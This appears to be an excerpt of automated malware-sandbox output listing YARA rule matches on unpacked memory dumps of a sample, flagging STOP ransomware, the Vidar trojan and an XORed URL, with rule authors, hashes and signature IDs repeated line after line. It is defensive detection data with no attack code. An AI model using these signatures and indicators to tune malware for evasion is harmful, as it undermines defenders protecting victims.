Source: 9.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
